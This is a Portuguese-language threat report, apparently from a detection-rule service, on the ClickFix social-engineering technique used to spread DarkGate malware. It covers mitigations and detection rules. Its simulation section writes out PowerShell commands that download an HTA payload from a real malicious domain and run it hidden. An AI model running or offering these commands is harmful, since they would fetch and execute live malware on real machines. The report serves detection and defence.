Estudo de Caso ClickFix: Malware DarkGate
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório descreve um método de engenharia social denominado ClickFix que persuade os usuários a copiar e executar um comando PowerShell, que então baixa um arquivo HTA malicioso. Este arquivo HTA, por sua vez, baixa componentes adicionais, incluindo um script AutoIt que cria diretórios, solta arquivos e estabelece comunicações C2. A atividade é atribuída à campanha DarkGate e depende de ofuscação com base64 além de adulteração da área de transferência para evitar detecção direta.
Investigação
Analistas desvendaram várias camadas de conteúdo codificado em base64 embutido em uma página de alerta de extensão de navegador falsa e recuperaram o comando PowerShell responsável por buscar dark.hta de linktoxic34.com. Quando executado, o HTA implanta um executável AutoIt (fckhffh.a3x) que executa uma rotina DES e lança cargas adicionais. A telemetria de rede capturada mostra tráfego HTTP(S) para o domínio malicioso, seguido pela execução encadeada de script PowerShell.
Mitigação
As defesas recomendadas incluem treinamento de conscientização do usuário para desencorajar a cópia de trechos desconhecidos de código, desabilitar a caixa de diálogo Executar do Windows através da Política de Grupo e implementar soluções antivírus baseadas em comportamento. Bloquear proativamente o domínio malicioso e monitorar execuções anômalas de PowerShell pode reduzir significativamente o risco de infecção pelo DarkGate.
Resposta
Se um evento relacionado ao ClickFix for identificado, isole o endpoint afetado, interrompa todos os processos maliciosos, remova os artefatos HTA e AutoIt, e realize análises forenses em quaisquer pastas criadas durante a intrusão. Atualize a lógica de detecção para sinalizar padrões suspeitos de execução de PowerShell e HTA e assegure-se de que o domínio associado seja bloqueado em todo o ambiente.
Fluxo de Ataque
Detecções
Comportamento Suspeito de Evasão de Defesa MSHTA LOLBAS por Detecção de Comandos Associados (via process_creation)
Visualizar
Strings Suspeitas de PowerShell (via powershell)
Visualizar
Binário AutoIT Foi Executado De Localização Incomum (via process_creation)
Visualizar
Arquivos Suspeitos no Perfil de Usuário Público (via file_event)
Visualizar
Execução Suspeita do Perfil de Usuário Público (via process_creation)
Visualizar
Chamar Métodos Suspeitos do .NET a partir do PowerShell (via powershell)
Visualizar
IOCs (HashSha256) para detectar: ClickFix: DarkGate
Visualizar
Detecção de Atividade Maliciosa de PowerShell para Download de Arquivo HTA [Conexão de Rede Windows]
Visualizar
Atividade Maliciosa de PowerShell Envolvendo a Execução de HTA e Manipulação da Área de Transferência [Windows PowerShell]
Visualizar
Execução de Simulação
Pré-requisito: O Cheque Pré-voo de Telemetria & Baseline deve ter sido aprovado.
Fundamentação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa & Comandos de Ataque:
Um atacante que obteve acesso de baixo privilégio em um host Windows comprometido deseja baixar uma carga de HTA maliciosa usada na campanha ClickFix. Para permanecer furtivo, o atacante utiliza PowerShell—uma ferramenta nativa do Windows—para que nenhum binário externo seja introduzido. O comando é executado diretamente no console (ou via uma tarefa agendada) e inclui a URL exata que a regra monitora. O download é armazenado no%TEMP%do usuário e então executado viaStart-Process.$url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $out = "$env:TEMPdark.hta" Invoke-WebRequest -Uri $url -OutFile $out Start-Process -FilePath $out -
Script de Teste de Regressão: (autocontido, reproduz as etapas acima)
# Simulação de download ClickFix HTA – aciona a regra Sigma $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $destPath = "$env:TEMPdark.hta" try { Write-Host "[*] Downloading malicious HTA payload..." Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing Write-Host "[+] Download complete. Executing payload..." Start-Process -FilePath $destPath -WindowStyle Hidden } catch { Write-Error "Download or execution failed: $_" } -
Comandos de Limpeza: (remove o HTA baixado e qualquer instância em execução)
# Remove o arquivo HTA e termina qualquer processo residual $htaPath = "$env:TEMPdark.hta" if (Test-Path $htaPath) { Remove-Item $htaPath -Force Write-Host "[*] HTA file removed." } # Mate qualquer processo que possa ter sido lançado a partir do HTA (exemplo genérico) Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force